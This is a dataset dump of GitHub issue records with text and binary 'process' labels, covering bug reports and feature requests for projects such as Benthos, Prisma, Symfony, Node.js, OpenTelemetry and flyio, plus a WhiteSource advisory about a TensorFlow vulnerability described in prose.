Unnamed: 0 int64 0 832k | id float64 2.49B 32.1B | type stringclasses 1 value | created_at stringlengths 19 19 | repo stringlengths 7 112 | repo_url stringlengths 36 141 | action stringclasses 3 values | title stringlengths 1 744 | labels stringlengths 4 574 | body stringlengths 9 211k | index stringclasses 10 values | text_combine stringlengths 96 211k | label stringclasses 2 values | text stringlengths 96 188k | binary_label int64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
11,942 | 14,707,710,553 | IssuesEvent | 2021-01-04 22:06:16 | Jeffail/benthos | https://api.github.com/repos/Jeffail/benthos | closed | Add support for Grok pattern definitions in external file(s) | bughancement processors | We have a lot of Grok patterns and we'd like to deploy the yaml file from our cfgmgmt system. It makes little sense to include the Grok patterns literally -- they are normal deployed using an RPM, we have tests etc for them.
Would it be possible to provide a `pattern_source` giving a directory (preferably) or file of patterns that should be included next to the default patterns? | 1.0 | Add support for Grok pattern definitions in external file(s) - We have a lot of Grok patterns and we'd like to deploy the yaml file from our cfgmgmt system. It makes little sense to include the Grok patterns literally -- they are normal deployed using an RPM, we have tests etc for them.
Would it be possible to provide a `pattern_source` giving a directory (preferably) or file of patterns that should be included next to the default patterns? | process | add support for grok pattern definitions in external file s we have a lot of grok patterns and we d like to deploy the yaml file from our cfgmgmt system it makes little sense to include the grok patterns literally they are normal deployed using an rpm we have tests etc for them would it be possible to provide a pattern source giving a directory preferably or file of patterns that should be included next to the default patterns | 1 |
17,504 | 23,315,753,151 | IssuesEvent | 2022-08-08 12:22:47 | prisma/prisma | https://api.github.com/repos/prisma/prisma | closed | Hi Prisma Team! Prisma Migrate just crashed. | bug/0-unknown kind/bug process/candidate team/schema topic: prisma db pull topic: Your friendly prisma developers | Hi Prisma Team! Prisma Migrate just crashed.
## Command
`db pull`
## Versions
| Name | Version |
|-------------|--------------------|
| Platform | darwin |
| Node | v16.15.1 |
| Prisma CLI | 4.1.0 |
| Engine | 8d8414deb360336e4698a65aa45a1fbaf1ce13d8|
## Error
```
Error: [libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
```
Oops, an unexpected error occured!
[libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
<img width="1346" alt="Screen Shot 2022-07-23 at 18 07 57" src="https://user-images.githubusercontent.com/42682090/180610852-c106747d-0f40-42a7-90f0-db014982b2de.png">
| 1.0 | Hi Prisma Team! Prisma Migrate just crashed. - Hi Prisma Team! Prisma Migrate just crashed.
## Command
`db pull`
## Versions
| Name | Version |
|-------------|--------------------|
| Platform | darwin |
| Node | v16.15.1 |
| Prisma CLI | 4.1.0 |
| Engine | 8d8414deb360336e4698a65aa45a1fbaf1ce13d8|
## Error
```
Error: [libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
```
Oops, an unexpected error occured!
[libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
<img width="1346" alt="Screen Shot 2022-07-23 at 18 07 57" src="https://user-images.githubusercontent.com/42682090/180610852-c106747d-0f40-42a7-90f0-db014982b2de.png">
| process | hi prisma team prisma migrate just crashed hi prisma team prisma migrate just crashed command db pull versions name version platform darwin node prisma cli engine error error hi there we ve been seeing this error in our error reporting backend but cannot reproduce it in our own tests the problem is that we have a primary key in the model product that uses the column categoryid which we for some reason don t have in our internal representation if you see this could you please file an issue to so we can discuss about fixing this your friendly prisma developers oops an unexpected error occured hi there we ve been seeing this error in our error reporting backend but cannot reproduce it in our own tests the problem is that we have a primary key in the model product that uses the column categoryid which we for some reason don t have in our internal representation if you see this could you please file an issue to so we can discuss about fixing this your friendly prisma developers img width alt screen shot at src | 1 |
1,835 | 4,634,649,980 | IssuesEvent | 2016-09-29 02:20:54 | symfony/symfony | https://api.github.com/repos/symfony/symfony | closed | ExecutableFinder generates wrong Path | Bug Process Status: Reviewed | Hi,
the executableFinder is generating a wrong path if you have open_basedir in action.
For example you have installed java in /usr/bin/java and your open_basedir is set to /usr/bin/ the ExecutableFinder will return /usr/bin//java. The problem is that the open_basedir restrictions now say your are not allowed to access /usr/bin//java because of the two slashes.
See: https://github.com/symfony/process/blob/master/ExecutableFinder.php#L82
```php
/**
* $dir = /usr/bin/
* $name = java
* $suffix = '' (empty)
*/
if (is_file($file = $dir.DIRECTORY_SEPARATOR.$name.$suffix) && ('\\' === DIRECTORY_SEPARATOR || is_executable($file))) {
```
Best regards
Tobi
| 1.0 | ExecutableFinder generates wrong Path - Hi,
the executableFinder is generating a wrong path if you have open_basedir in action.
For example you have installed java in /usr/bin/java and your open_basedir is set to /usr/bin/ the ExecutableFinder will return /usr/bin//java. The problem is that the open_basedir restrictions now say your are not allowed to access /usr/bin//java because of the two slashes.
See: https://github.com/symfony/process/blob/master/ExecutableFinder.php#L82
```php
/**
* $dir = /usr/bin/
* $name = java
* $suffix = '' (empty)
*/
if (is_file($file = $dir.DIRECTORY_SEPARATOR.$name.$suffix) && ('\\' === DIRECTORY_SEPARATOR || is_executable($file))) {
```
Best regards
Tobi
| process | executablefinder generates wrong path hi the executablefinder is generating a wrong path if you have open basedir in action for example you have installed java in usr bin java and your open basedir is set to usr bin the executablefinder will return usr bin java the problem is that the open basedir restrictions now say your are not allowed to access usr bin java because of the two slashes see php dir usr bin name java suffix empty if is file file dir directory separator name suffix directory separator is executable file best regards tobi | 1 |
3,628 | 6,664,067,955 | IssuesEvent | 2017-10-02 18:44:21 | nodejs/node | https://api.github.com/repos/nodejs/node | closed | fork() does not emit 'error' if process creation fails | child_process | <!--
Thank you for reporting an issue.
This issue tracker is for bugs and issues found within Node.js core.
If you require more general support please file an issue on our help
repo. https://github.com/nodejs/help
Please fill in as much of the template below as you're able.
Version: output of `node -v`
Platform: output of `uname -a` (UNIX), or version and 32 or 64-bit (Windows)
Subsystem: if known, please specify affected core module name
If possible, please provide code that demonstrates the problem, keeping it as
simple and free of external dependencies as you are able.
-->
<!-- Enter your issue details below this comment. -->
* **Version**: v8.6.0
* **Platform**: Linux 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:49:46 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
* **Subsystem**: child_process
Unlike `spawn` in `fork` on `error` is not executed.
```Javascript
const { fork } = require('child_process');
const subprocess = fork('bad_command');
subprocess.on('error', (err) => {
console.log('Failed to start subprocess.', err);
});
```
| 1.0 | fork() does not emit 'error' if process creation fails - <!--
Thank you for reporting an issue.
This issue tracker is for bugs and issues found within Node.js core.
If you require more general support please file an issue on our help
repo. https://github.com/nodejs/help
Please fill in as much of the template below as you're able.
Version: output of `node -v`
Platform: output of `uname -a` (UNIX), or version and 32 or 64-bit (Windows)
Subsystem: if known, please specify affected core module name
If possible, please provide code that demonstrates the problem, keeping it as
simple and free of external dependencies as you are able.
-->
<!-- Enter your issue details below this comment. -->
* **Version**: v8.6.0
* **Platform**: Linux 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:49:46 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
* **Subsystem**: child_process
Unlike `spawn` in `fork` on `error` is not executed.
```Javascript
const { fork } = require('child_process');
const subprocess = fork('bad_command');
subprocess.on('error', (err) => {
console.log('Failed to start subprocess.', err);
});
```
| process | fork does not emit error if process creation fails thank you for reporting an issue this issue tracker is for bugs and issues found within node js core if you require more general support please file an issue on our help repo please fill in as much of the template below as you re able version output of node v platform output of uname a unix or version and or bit windows subsystem if known please specify affected core module name if possible please provide code that demonstrates the problem keeping it as simple and free of external dependencies as you are able version platform linux generic ubuntu smp thu apr utc gnu linux subsystem child process unlike spawn in fork on error is not executed javascript const fork require child process const subprocess fork bad command subprocess on error err console log failed to start subprocess err | 1 |
44,543 | 5,632,907,051 | IssuesEvent | 2017-04-05 17:39:53 | sunpy/sunpy | https://api.github.com/repos/sunpy/sunpy | closed | Write additional unit tests for sunpy.lightcurve.lightcurve | Lightcurve Tests | Some tests have been written but gaps in coverage exist.
| 1.0 | Write additional unit tests for sunpy.lightcurve.lightcurve - Some tests have been written but gaps in coverage exist.
| non_process | write additional unit tests for sunpy lightcurve lightcurve some tests have been written but gaps in coverage exist | 0 |
15,817 | 20,014,634,513 | IssuesEvent | 2022-02-01 10:45:53 | ietf-wg-jsonpath/draft-ietf-jsonpath-base | https://api.github.com/repos/ietf-wg-jsonpath/draft-ietf-jsonpath-base | closed | "Union" could have more description, and maybe a new name | processing-model has PR | The term "union" will likely be unfamiliar for readers (it is for me) and could use a bit more description than "A union ~matcher~ selector consists of one or more union elements."
"Union" isn't a common term outside of set manipulation. I would call the `[...]` an "indexer," which is a much more well-known term and is already associated with this construct in many programming languages. The values inside are indices (as opposed to "union children" or "union elements"), of which there are multiple types:
- Integer
- Slice
- String
- Container query expression
- Item query expression
See [selector query expressions](https://github.com/jsonpath-standard/internet-draft/issues/17) for more details on the query-style indexers. | 1.0 | "Union" could have more description, and maybe a new name - The term "union" will likely be unfamiliar for readers (it is for me) and could use a bit more description than "A union ~matcher~ selector consists of one or more union elements."
"Union" isn't a common term outside of set manipulation. I would call the `[...]` an "indexer," which is a much more well-known term and is already associated with this construct in many programming languages. The values inside are indices (as opposed to "union children" or "union elements"), of which there are multiple types:
- Integer
- Slice
- String
- Container query expression
- Item query expression
See [selector query expressions](https://github.com/jsonpath-standard/internet-draft/issues/17) for more details on the query-style indexers. | process | union could have more description and maybe a new name the term union will likely be unfamiliar for readers it is for me and could use a bit more description than a union matcher selector consists of one or more union elements union isn t a common term outside of set manipulation i would call the an indexer which is a much more well known term and is already associated with this construct in many programming languages the values inside are indices as opposed to union children or union elements of which there are multiple types integer slice string container query expression item query expression see for more details on the query style indexers | 1 |
120,697 | 17,644,259,793 | IssuesEvent | 2021-08-20 02:04:28 | DavidSpek/kale | https://api.github.com/repos/DavidSpek/kale | opened | CVE-2021-37667 (High) detected in tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl, tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl | security vulnerability | ## CVE-2021-37667 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b>, <b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>
<details><summary><b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl">https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>
Dependency Hierarchy:
- :x: **tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl** (Vulnerable Library)
</details>
<details><summary><b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl">https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>
Dependency Hierarchy:
- tfx_bsl-0.21.4-cp27-cp27mu-manylinux2010_x86_64.whl (Root Library)
- :x: **tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty. We have patched the issue in GitHub commit 2e0ee46f1a47675152d3d865797a18358881d7a6. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
<p>Publish Date: 2021-08-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-37667>CVE-2021-37667</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h</a></p>
<p>Release Date: 2021-08-12</p>
<p>Fix Resolution: tensorflow - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-cpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-gpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-37667 (High) detected in tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl, tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl - ## CVE-2021-37667 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b>, <b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>
<details><summary><b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl">https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>
Dependency Hierarchy:
- :x: **tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl** (Vulnerable Library)
</details>
<details><summary><b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl">https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>
Dependency Hierarchy:
- tfx_bsl-0.21.4-cp27-cp27mu-manylinux2010_x86_64.whl (Root Library)
- :x: **tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty. We have patched the issue in GitHub commit 2e0ee46f1a47675152d3d865797a18358881d7a6. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
<p>Publish Date: 2021-08-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-37667>CVE-2021-37667</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h</a></p>
<p>Release Date: 2021-08-12</p>
<p>Fix Resolution: tensorflow - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-cpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-gpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve high detected in tensorflow whl tensorflow whl cve high severity vulnerability vulnerable libraries tensorflow whl tensorflow whl tensorflow whl tensorflow is an open source machine learning framework for everyone library home page a href path to dependency file kale examples dog breed classification requirements requirements txt path to vulnerable library kale examples dog breed classification requirements requirements txt dependency hierarchy x tensorflow whl vulnerable library tensorflow whl tensorflow is an open source machine learning framework for everyone library home page a href path to dependency file kale examples taxi cab classification requirements txt path to vulnerable library kale examples taxi cab classification requirements txt dependency hierarchy tfx bsl whl root library x tensorflow whl vulnerable library found in base branch master vulnerability details tensorflow is an end to end open source platform for machine learning in affected versions an attacker can cause undefined behavior via binding a reference to null pointer in tf raw ops unicodeencode the reads the first dimension of the input splits tensor before validating that this tensor is not empty we have patched the issue in github commit the fix will be included in tensorflow we will also cherrypick this commit on tensorflow tensorflow and tensorflow as these are also affected and still in supported range publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required low user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution tensorflow tensorflow cpu tensorflow gpu step up your open source security game with whitesource | 0 |
4,402 | 7,296,341,756 | IssuesEvent | 2018-02-26 10:26:04 | UKHomeOffice/dq-aws-transition | https://api.github.com/repos/UKHomeOffice/dq-aws-transition | opened | Add ACL FTP crontab entry to 00201SG1LFTP01.crontab | DQ Data Ingest DQ Tranche 1 Production SSM processing | # ACL from ACL FTP server
*/10 0 * * * /ADT/scripts/ftp_acl_web02.py | 1.0 | Add ACL FTP crontab entry to 00201SG1LFTP01.crontab - # ACL from ACL FTP server
*/10 0 * * * /ADT/scripts/ftp_acl_web02.py | process | add acl ftp crontab entry to crontab acl from acl ftp server adt scripts ftp acl py | 1 |
17,808 | 23,730,407,710 | IssuesEvent | 2022-08-31 00:52:16 | open-telemetry/opentelemetry-collector-contrib | https://api.github.com/repos/open-telemetry/opentelemetry-collector-contrib | closed | prometheus translator: multiple target metric might be emitted if gropubyattrs processor is involved | bug priority:p2 exporter/prometheusremotewrite receiver/prometheus processor/groupbyattrs | **Describe the bug**
A clear and concise description of what the bug is.
Given a metrics pipeline like `prometheus` receiver -> `groupbyattrs` processor -> `prometheusremotewrite` exporter, since groupbyattrs sort of splits the `pmetric.Metrics` to multiple `pmetric.Metrics` and in `prometheusremotewrite` exporter, the translator [adds](https://github.com/open-telemetry/opentelemetry-collector-contrib/blob/main/pkg/translator/prometheusremotewrite/metrics_to_prw.go#L103) resource target info(the `target` metric) for every `pmetric.Metrics`, which turns out eventually we got multiple `target` metric, see additional context part for more details for our use case.
**Steps to reproduce**
give a simple metrics like
```
# HELP m
# TYPE m gauge
m{a="a", n="1"} 0
m{a="a", n="2"} 0
m{a="b", n="1"} 0
m{a="b", n="2"} 0
```
and a config
```yaml
receivers:
prometheus:
config:
scrape_configs:
- job_name: kubernetes-cadvisor-metrics
metrics_path: /metrics.txt
static_configs:
- targets:
- localhost:8000
exporters:
prometheusremotewrite:
endpoint: http://localhost:8428/api/v1/write
processors:
batch:
groupbyattrs:
keys:
- a
service:
telemetry:
logs:
level: debug
metrics:
level: detailed
address: 127.0.0.1:8888
pipelines:
metrics:
receivers: [prometheus]
processors: [batch, groupbyattrs]
exporters: [ prometheusremotewrite ]
```

**What did you expect to see?**
Just one target metric for a scrape target.
**What did you see instead?**
Multiple target metrics.
**What version did you use?**
Version: v0.55.0
**What config did you use?**
Config: (e.g. the yaml config file)
**Environment**
OS: (e.g., "Ubuntu 20.04")
Compiler(if manually compiled): (e.g., "go 14.2")
**Additional context**
The reason we need groupbyattrs is that we are collecting cadvisor metrics and enrich them with additional pod info, to do so we group metrics by `namespace` and `pod` name, then follow by a `k8sattributes` processor as it only supports enrichment based on resources, not metric attributes currently, and probably more efficient as enrich multiple metrics multiple times seems to be more expensive than group multiple metrics by 2 attributes.
```yaml
resource/copy:
attributes:
- key: k8s.namespace.name
from_attribute: namespace
action: insert
- key: k8s.pod.name
from_attribute: pod
action: insert
k8sattributes:
pod_association:
- sources:
- from: resource_attribute
name: k8s.namespace.name
- from: resource_attribute
name: k8s.pod.name
```
| 1.0 | prometheus translator: multiple target metric might be emitted if gropubyattrs processor is involved - **Describe the bug**
A clear and concise description of what the bug is.
Given a metrics pipeline like `prometheus` receiver -> `groupbyattrs` processor -> `prometheusremotewrite` exporter, since groupbyattrs sort of splits the `pmetric.Metrics` to multiple `pmetric.Metrics` and in `prometheusremotewrite` exporter, the translator [adds](https://github.com/open-telemetry/opentelemetry-collector-contrib/blob/main/pkg/translator/prometheusremotewrite/metrics_to_prw.go#L103) resource target info(the `target` metric) for every `pmetric.Metrics`, which turns out eventually we got multiple `target` metric, see additional context part for more details for our use case.
**Steps to reproduce**
give a simple metrics like
```
# HELP m
# TYPE m gauge
m{a="a", n="1"} 0
m{a="a", n="2"} 0
m{a="b", n="1"} 0
m{a="b", n="2"} 0
```
and a config
```yaml
receivers:
prometheus:
config:
scrape_configs:
- job_name: kubernetes-cadvisor-metrics
metrics_path: /metrics.txt
static_configs:
- targets:
- localhost:8000
exporters:
prometheusremotewrite:
endpoint: http://localhost:8428/api/v1/write
processors:
batch:
groupbyattrs:
keys:
- a
service:
telemetry:
logs:
level: debug
metrics:
level: detailed
address: 127.0.0.1:8888
pipelines:
metrics:
receivers: [prometheus]
processors: [batch, groupbyattrs]
exporters: [ prometheusremotewrite ]
```

**What did you expect to see?**
Just one target metric for a scrape target.
**What did you see instead?**
Multiple target metrics.
**What version did you use?**
Version: v0.55.0
**What config did you use?**
Config: (e.g. the yaml config file)
**Environment**
OS: (e.g., "Ubuntu 20.04")
Compiler(if manually compiled): (e.g., "go 14.2")
**Additional context**
The reason we need groupbyattrs is that we are collecting cadvisor metrics and enrich them with additional pod info, to do so we group metrics by `namespace` and `pod` name, then follow by a `k8sattributes` processor as it only supports enrichment based on resources, not metric attributes currently, and probably more efficient as enrich multiple metrics multiple times seems to be more expensive than group multiple metrics by 2 attributes.
```yaml
resource/copy:
attributes:
- key: k8s.namespace.name
from_attribute: namespace
action: insert
- key: k8s.pod.name
from_attribute: pod
action: insert
k8sattributes:
pod_association:
- sources:
- from: resource_attribute
name: k8s.namespace.name
- from: resource_attribute
name: k8s.pod.name
```
| process | prometheus translator multiple target metric might be emitted if gropubyattrs processor is involved describe the bug a clear and concise description of what the bug is given a metrics pipeline like prometheus receiver groupbyattrs processor prometheusremotewrite exporter since groupbyattrs sort of splits the pmetric metrics to multiple pmetric metrics and in prometheusremotewrite exporter the translator resource target info the target metric for every pmetric metrics which turns out eventually we got multiple target metric see additional context part for more details for our use case steps to reproduce give a simple metrics like help m type m gauge m a a n m a a n m a b n m a b n and a config yaml receivers prometheus config scrape configs job name kubernetes cadvisor metrics metrics path metrics txt static configs targets localhost exporters prometheusremotewrite endpoint processors batch groupbyattrs keys a service telemetry logs level debug metrics level detailed address pipelines metrics receivers processors exporters what did you expect to see just one target metric for a scrape target what did you see instead multiple target metrics what version did you use version what config did you use config e g the yaml config file environment os e g ubuntu compiler if manually compiled e g go additional context the reason we need groupbyattrs is that we are collecting cadvisor metrics and enrich them with additional pod info to do so we group metrics by namespace and pod name then follow by a processor as it only supports enrichment based on resources not metric attributes currently and probably more efficient as enrich multiple metrics multiple times seems to be more expensive than group multiple metrics by attributes yaml resource copy attributes key namespace name from attribute namespace action insert key pod name from attribute pod action insert pod association sources from resource attribute name namespace name from resource attribute name pod name | 1 |
5,838 | 8,666,698,461 | IssuesEvent | 2018-11-29 05:36:46 | wendux/fly | https://api.github.com/repos/wendux/fly | closed | 最新版(0.6.4)在Linux(centos)上运行报错 | processing | 更新到最新版:**0.6.4**
Mac OS(10.14)和Windows 10上运行一切正常,可是部署在阿里云(**CentOS Linux release 7.5.1804**)之后,报如下错误:
```
RangeError: Maximum call stack size exceeded (uncaughtException throw 1 times on pid:30014)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:143:26)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
